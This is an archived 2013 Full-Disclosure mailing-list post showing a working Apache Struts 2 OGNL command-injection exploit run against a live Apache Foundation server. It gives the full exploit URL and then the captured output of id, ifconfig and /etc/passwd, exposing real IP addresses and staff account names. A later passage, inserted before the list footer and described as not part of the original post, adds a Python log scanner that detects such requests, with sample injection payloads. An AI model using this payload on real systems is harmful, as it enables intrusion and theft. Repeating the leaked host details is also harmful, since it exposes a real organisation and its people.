Message-ID: <CAPQ_=KVhyw_TFVYysKCFz2RhDSW9kpPCkigFdfGq1ny0+jE9WA@mail.gmail.com>
Date: Sun, 13 Oct 2013 17:28:19 +0800
From: you help <help.en@...yun.org>
To: full-disclosure@...ts.grok.org.uk
Subject: Apache Software Foundation subsite remote command execution
*Abstract:*
# Apache, Mind Yourself
Apache Struts 2: a vulnerability introduced by manipulating parameters
prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command
execution.
*Details:*
#show the webroot
http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/home/continuum/apache-continuum-1.4.1/apps/continuum
*Proofs of concept:*
#id
uid=1001(continuum) gid=1001(continuum) groups=1001(continuum)
#/sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:ae:00:0b
inet addr:140.211.11.54 Bcast:140.211.11.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feae:b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:22081926 errors:0 dropped:0 overruns:0 frame:0
TX packets:7627912 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:26173286052 (26.1 GB) TX bytes:3491916802 (3.4 GB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:42196069 errors:0 dropped:0 overruns:0 frame:0
TX packets:42196069 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:24001777186 (24.0 GB) TX bytes:24001777186 (24.0 GB)
#cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
landscape:x:102:108::/var/lib/landscape:/bin/false
gmcdonald:x:1000:1000:gmcdonald,,,:/home/gmcdonald:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
continuum:x:1001:1001::/home/continuum:/bin/sh
archiva:x:1002:1002::/home/archiva:/bin/sh
postfix:x:104:113::/var/spool/postfix:/bin/false
messagebus:x:105:115::/var/run/dbus:/bin/false
avahi:x:106:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
brett:x:1717:1717::/home/brett:/bin/bash
mysql:x:107:117:MySQL Server,,,:/var/lib/mysql:/bin/false
smmta:x:108:118:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:109:119:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
apbackup:x:1718:1718::/home/apbackup:/bin/sh
pctony:x:2097:2097::/home/pctony:/bin/bash
ntp:x:110:120::/home/ntp:/bin/false
evenisse:x:1003:1003:Emmanuel Venisse,,,:/home/evenisse:/bin/bash
puppet:x:111:121:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
olamy:x:1004:1004:Olivier Lamy,,,:/home/olamy:/bin/bash
usbmux:x:112:46:usbmux daemon,,,:/home/usbmux:/bin/false
markt:x:1787:1787:medthomas:/home/markt:/bin/bash
--------------------------------------------------------------------------------------------------------------------------------
*Author*: 猪猪侠 <http://en.wooyun.org/whitehats/%E7%8C%AA%E7%8C%AA%E4%BE%A0>
*From:* http://en.wooyun.org/bugs/wooyun-2013-06?2605
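The abstract above names the three parameter-name prefixes ("action:", "redirect:", "redirectAction:") that the Struts 2 action mapper handed to OGNL, the bug class covered by the Struts advisory S2-016, and the request on the page carries its whole payload in a GET query string. As an added example, not part of the original post and not code from any Apache project, here is a Python scanner that applies that detection logic to web-server access logs: it decodes each query-string parameter name, matches the three prefixes, and reports whether what follows the prefix is an OGNL expression (an exploitation attempt) or a plain prefix use. The log lines, addresses, timestamps and the shortened payloads are constructed for the example, and the function names are my own.

```python
"""Flag Struts 2 prefix-parameter (action:/redirect:/redirectAction:) abuse in access logs."""
import re
from urllib.parse import parse_qsl

# The three parameter-name prefixes named in the post. Struts matched them
# case-sensitively, so the scanner does too.
PREFIXES = ("action:", "redirect:", "redirectAction:")

# Tokens that only make sense if the remainder of the name is an OGNL
# expression rather than a plain action name or URL.
OGNL_MARKERS = ("${", "%{", "#", "@")

# Common Log Format request line; trailing fields (referer, user agent) are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Constructed sample log (not from the original post): a benign hit, two OGNL
# injections via the redirect: and redirectAction: prefixes (payloads shortened),
# a plain open-redirect style use of redirect:, and a POST whose body is not
# visible in the access log at all.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Oct/2013:17:20:01 +0800] "GET /continuum/groupSummary.action HTTP/1.1" 200 8123
10.0.0.5 - - [13/Oct/2013:17:20:07 +0800] "GET /continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'id'})).start()} HTTP/1.1" 302 0
10.0.0.9 - - [13/Oct/2013:17:21:15 +0800] "GET /continuum/login.action?redirectAction:%25%7B%23context%5b'xwork.MethodAccessor.denyMethodExecution'%5d%3dfalse%7D HTTP/1.1" 302 0
10.0.0.9 - - [13/Oct/2013:17:22:40 +0800] "GET /continuum/login.action?redirect:http://attacker.example/ HTTP/1.1" 302 0
10.0.0.7 - - [13/Oct/2013:17:23:02 +0800] "POST /continuum/login.action HTTP/1.1" 200 512
"""


def classify_name(name):
    """Return (kind, prefix, expression) for one decoded parameter name, or None.

    Struts passed everything after a matching prefix to the action mapper, so
    the OGNL (if any) lives in the parameter *name*; the value is irrelevant.
    """
    for prefix in PREFIXES:
        if name.startswith(prefix):
            expr = name[len(prefix):]
            if any(marker in expr for marker in OGNL_MARKERS):
                return "ognl_injection", prefix, expr
            return "prefix_used", prefix, expr
    return None


def scan_target(target):
    """Decode the query string of a request target and classify every parameter name."""
    query = target.partition("?")[2]
    findings = []
    # keep_blank_values: the exploit puts the payload in the name with no '=value'.
    for name, _value in parse_qsl(query, keep_blank_values=True):
        hit = classify_name(name)
        if hit:
            kind, prefix, expr = hit
            findings.append({"kind": kind, "prefix": prefix, "expr": expr})
    return findings


def scan_log(text):
    """Run scan_target over every parsable log line and return alert records."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for finding in scan_target(m["target"]):
            alerts.append({
                "line": lineno,
                "ip": m["ip"],
                "method": m["method"],
                "path": m["target"].partition("?")[0],
                **finding,
            })
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f'line {a["line"]} {a["ip"]} {a["method"]} {a["path"]} '
              f'{a["kind"]} via {a["prefix"]} -> {a["expr"][:60]}')
```

Two caveats. The request on the page is a GET, so the payload sits in the request line and lands in the access log; the same parameter sent in a POST body leaves no trace there, so this catches only GET-borne attempts and a reverse proxy or WAF that inspects bodies is needed for the rest. And a bare `prefix_used` hit is still worth a look: the prefixes themselves were the problem, and the fix release named in S2-016 (Struts 2.3.15.1) removed the redirect: and redirectAction: prefixes outright, so on a patched server any request carrying them is someone probing.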
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/